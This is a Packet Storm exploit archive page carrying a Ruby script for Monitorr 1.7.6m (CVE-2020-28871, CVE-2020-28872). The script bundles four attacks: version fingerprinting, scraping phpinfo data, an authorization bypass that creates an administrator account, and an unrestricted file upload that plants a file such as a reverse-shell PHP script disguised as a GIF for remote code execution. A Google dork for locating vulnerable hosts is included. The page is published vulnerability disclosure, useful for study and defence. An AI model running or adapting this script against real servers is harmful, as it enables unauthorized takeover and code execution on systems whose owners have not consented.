what you don't know can hurt you

Monitorr 1.7.6m Bypass / Information Disclosure / Shell Upload

Monitorr 1.7.6m Bypass / Information Disclosure / Shell Upload
Posted Jun 23, 2021
Authored by Alexandre Zanni

This ruby script is a 4-in-1 exploit that leverages shell upload, bypass, and information disclosure vulnerabilities in Monitorr version 1.7.6m.

tags | exploit, shell, vulnerability, bypass, info disclosure, ruby
advisories | CVE-2020-28871, CVE-2020-28872
MD5 | 5113f4119e78d0b0c1dcb46bad362104

Monitorr 1.7.6m Bypass / Information Disclosure / Shell Upload

Change Mirror Download
#!/usr/bin/env ruby

# Exploit
## Title: Monitorr exploit toolkit
## Google Dorks:
## inurl:/assets/config/_installation/_register.php?action=register
## Author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)
## Author website: https://pwn.by/noraj/
## Exploit source: https://github.com/sec-it/monitorr-exploit-toolkit
## Date: 2021-06-22
## Vendor Homepage: https://github.com/Monitorr/Monitorr/
## Software Link: https://github.com/Monitorr/Monitorr/archive/refs/tags/1.7.6m.tar.gz
## Version: at least 1.7.6m
## Tested on: OpenNetAdmin 1.7.6.m

require 'pathname'
require 'httpx'
require 'docopt'

doc = <<~DOCOPT
Monitorr-Exploit

Usage:
#{__FILE__} upload <url> <file> [--debug]
#{__FILE__} create <url> <user> <pass> <email> [--debug]
#{__FILE__} version <url> [--debug]
#{__FILE__} phpinfo <url> [--debug]
#{__FILE__} -h | --help

upload: Upload a file (RCE via unrestricted file upload)
version: Try to fetch Monitorr version
phpinfo: Extract main phpinfo() information (Information leakage)
create: Create an administrator account (Authorization bypass)

Options:
<url> Root URL (base path) including HTTP scheme, port and root folder
<file> File to be uploaded
--debug Display arguments
-h, --help Show this screen

Examples:
#{__FILE__} upload http://example.org revshell.php
#{__FILE__} create https://example.org:8080/monitorr/ noraj password 'noraj@pentest.local'
#{__FILE__} version https://example.org:7000/
DOCOPT

def version(root_url)
vuln_url = "#{root_url}/assets/js/version/version.txt"

HTTPX.get(vuln_url).body.to_s
end

def phpinfo(root_url)
vuln_url = "#{root_url}/assets/php/phpinfo.php"

res = HTTPX.get(vuln_url).body.to_s
sys = res.match(/>System\s?<\/td><td .+>(.+)<\/td>/).captures[0].chomp
phpver = res.match(/>PHP Version\s?<\/td><td .+>(.+)<\/td>/).captures[0].chomp
disablef = res.match(/>disable_functions\s?<\/td><td .+>(.+)<\/td>/).captures[0].chomp
openb = res.match(/>open_basedir\s?<\/td><td .+>(.+)<\/td>/).captures[0].chomp

"System: #{sys}\nPHP version: #{phpver}\ndisable_functions: #{disablef}\nopen_basedir: #{openb}\n\n" \
"Full phpinfo() location: #{vuln_url}"
end

# Password size should be >= 6
def create_user(root_url, username, password, email)
vuln_url = "#{root_url}/assets/config/_installation/_register.php?action=register"

params = {
'user_name' => username,
'user_email' => email,
'user_password_new' => password,
'user_password_repeat' => password,
'register' => 'Register'
}

success = HTTPX.post(vuln_url, form: params).body.to_s.match?(/User credentials have been created successfully/)

return '[-] User not created' unless success

"[+] User created\nUsername: #{username}\nEmail: #{email}\nPassword: #{password}"
end

def upload(root_url, filepath)
vuln_url = "#{root_url}/assets/php/upload.php"
pn = Pathname.new(filepath)

params = {
fileToUpload: {
content_type: 'image/gif',
filename: pn.basename.to_s,
body: pn
}
}

res = HTTPX.plugin(:multipart).post(vuln_url, form: params)

return '[-] File not upload' unless (200..299).include?(res.status)

"[+] File uploaded:\n#{root_url}/assets/data/usrimg/#{pn.basename}"
end

begin
args = Docopt.docopt(doc)
pp args if args['--debug']

if args['version']
puts version(args['<url>'])
elsif args['phpinfo']
puts phpinfo(args['<url>'])
elsif args['create']
puts create_user(args['<url>'], args['<user>'], args['<pass>'], args['<email>'])
elsif args['upload']
puts upload(args['<url>'], args['<file>'])
end
rescue Docopt::Exit => e
puts e.message
end
Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    28 Files
  • 23
    Sep 23rd
    13 Files
  • 24
    Sep 24th
    10 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close